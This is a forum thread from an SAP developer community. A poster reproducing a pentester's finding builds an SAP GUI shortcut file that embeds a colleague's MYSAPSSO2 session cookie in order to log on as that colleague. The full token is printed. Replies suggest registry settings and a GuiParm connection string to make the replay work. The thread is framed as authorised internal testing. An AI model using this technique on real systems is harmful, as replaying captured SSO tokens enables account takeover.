Application Development Discussions
Join the discussions or start your own on all things application development, including tools and APIs, programming models, and keeping your skills sharp.
cancel
Showing results for 
Search instead for 
Did you mean: 

SAP GUI session hijack

Former Member
0 Kudos

Dears,

quite recently we've been trying to perform a SAP GUI session hijack (within our corporation - only to reproduce something that an external pentester has proved is possible). Allegedly only a properly constructed SAP shortcut file including the victim's cookie is sufficient to be able to log on to SAP system as the victim. So I've been asked to write a brief report to create such a shortcut file with an additional parameter 'at' to which the victim's MYSAPSSO2 cookie value is assigned. I received the cookie value from a colleague but... a double-click on the shortcut makes me log in as... myself (instead of logging as the colleague). Both of us have respective users on the below system, so a missing user is not the case.

Here's what the shortcut file looks like:

[System]

Name=XXX

Description=XXX SAP XX

Client=010

[User]

Name=XXXXXXXX

at="MYSAPSSO2=AjExMDAgAA9bw3J0YWw6cGFkaXlhcnaIABNiYXNpY2F1dGhlbnRpY2F0aW9uAQAIUEFESVlBUlYCAAMwMDADAANDMVAEAAwyMDE2MDYwNzE0MzYFAAQAAAAICgAIUEFESVlBUlb%2FAQUwggEBBgkqhkiG9w0BBwKggfMwgfACAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHATGB0DCBzQIBATAiMB0xDDAKBgNVMABTA0MxUDENMAsGA1UECxMESjJFRQIDABAJBgUrDgMCGgUAoF0wGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMTYwNjA3MTQzNjU1WjAjBgkqhkiG9w0BCQQxFgQUu0UZjgRVxcNbqk3l8%2FA!4V5dnaUwCQYHKoZIzjgEAwQvMC0CFQCG9fWYsJm96tjNqVe6WB98ljyr4gIUftll1e6QPIa1mYFj4Sy%2FdFf2fuM%3D"

Language=EN

[Function]

Title=SAP Easy Access  -  User Menu for Xxxxxx Xxxxxxx

Command=SESSION_MANAGER

[Configuration]

I'd be grateful if you could point what I am still missing... Any other parameter required in the file?

Thanks in advance.

2 REPLIES 2

raymond_giuseppi
Active Contributor
0 Kudos

AFAIK there are parameters (SAP Gui, windows register) that allow storage of such information in shortcut, if not set (deafulat) this data wont be used.

Hint: look for [HKEY_LOCAL_MACHINE\Software\Wow6432Node\SAP\SAPShortcut\Security] also there are some security OSS notes on shortcut to browse.

Regards,

Raymond

LutzR
Active Contributor
0 Kudos

Hi Tomasz, this sounds like the system connection is defined using SNC (have a look at the network tab of the connection in SAP Logon). And identity information from SNC will most probably have priority over MYSAPSSO2 information.

What you could do is to define a shortcut without relating to an existing system definition by adding a GuiParm=<connection string>

to the [system] section of your shortcut file.

<connection string could look like this:

/M/myhost.mydomain.com/S/3600/G/MYLOGONGROUP

where

myhost.mydomain.com is the message server host

3600 ist the message server port

MYLOGONGROUP is the logon group


Or this is something completely different: do you already have a GUI session open to that system while testing your shortcut? Then the shortcut might simply open a new window in the existing session.

Regards,

Lutz